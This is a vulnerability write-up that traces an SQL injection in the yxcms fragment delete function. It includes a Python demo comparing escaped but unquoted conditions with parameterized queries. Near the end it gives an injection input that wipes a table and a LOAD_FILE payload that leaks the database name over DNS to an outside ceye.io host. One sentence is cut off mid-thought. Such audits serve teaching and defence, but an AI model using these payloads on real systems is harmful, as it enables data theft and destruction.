Code audit steps

1. Determine where user input enters.
2. Follow how that input is processed.
3. Find where it is output, and the exact position it is used.
yxcms SQL injection vulnerability

The vulnerability is in the delete function of the fragment list.

Set breakpoints. A breakpoint is set here because the request is sent as a GET via Ajax. Click the Delete function, then follow the execution step by step.

Skip the table model and its methods and look at the delete method. Continue to follow the _parseCondition method, then the parseCondition method. Here the values of the array are converted into the form id = escape($value) AND ... Continue to follow the escape method, then the _getReadLink method, which turns out to be where the database operations happen. After following it through, the only processing the data receives is mysql_real_escape_string.
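To show why escaping alone is not enough at this point, here is an added example (not yxcms code) that mirrors the id = escape($value) AND ... pattern in Python: a MySQL-style escape function, the condition builder as the audit found it, and a hardened builder that binds values as parameters. The table and the inputs are constructed for the demonstration; the column allow-list regex and the function names are my own assumptions.

```python
import re
import sqlite3


def mysql_style_escape(value: str) -> str:
    # Escapes the characters mysql_real_escape_string escapes; it never adds
    # the surrounding quotes, the caller is expected to supply those.
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in value)


COLUMN_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")  # assumed allow-list


def build_condition_unquoted(cond: dict) -> str:
    # The pattern the audit found: escape() is applied, but the value is pasted
    # into the SQL text without quotes, so a value that contains no quote
    # characters passes through unchanged and is parsed as SQL grammar.
    return " AND ".join(f"{col} = {mysql_style_escape(str(val))}"
                        for col, val in cond.items())


def build_condition_parameterized(cond: dict):
    # Hardened form: column names are allow-listed and values are sent as bind
    # parameters, so the database never parses them as SQL.
    for col in cond:
        if not COLUMN_RE.match(col):
            raise ValueError(f"illegal column name: {col!r}")
    return " AND ".join(f"{col} = ?" for col in cond), list(cond.values())


def rows_deleted(cond: dict, parameterized: bool) -> int:
    # Runs either builder against a throw-away SQLite table (constructed sample
    # data) and reports how many rows the DELETE actually removed.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE fragment (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO fragment VALUES (?, ?)",
                   [(1, "one"), (2, "two"), (3, "three")])
    if parameterized:
        where, params = build_condition_parameterized(cond)
        cur = db.execute(f"DELETE FROM fragment WHERE {where}", params)
    else:
        cur = db.execute(f"DELETE FROM fragment WHERE {build_condition_unquoted(cond)}")
    return cur.rowcount


if __name__ == "__main__":
    hostile = {"id": "1 OR 1=1"}  # constructed input: no quotes, escaping is a no-op
    print(rows_deleted({"id": 2}, parameterized=False))  # 1
    print(rows_deleted(hostile, parameterized=False))    # 3, whole table gone
    print(rows_deleted(hostile, parameterized=True))     # 0, treated as data
```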
Look at the traffic in Ethereal. There are two delete operations: one is not a POST, the other may be a POST, so the guess is the del method. The GET method is the delete operation above, and the following POST method is a

Constructed payload:
SELECT LOAD_FILE((CONCAT('\\', (SELECT DATABASE()), '.xxx.ceye.io\abc')))

The test succeeds. Injection can be achieved through POST, but not through the GET method (the specific reason is unclear).
Reference: https://www.freebuf.com/column/162886.html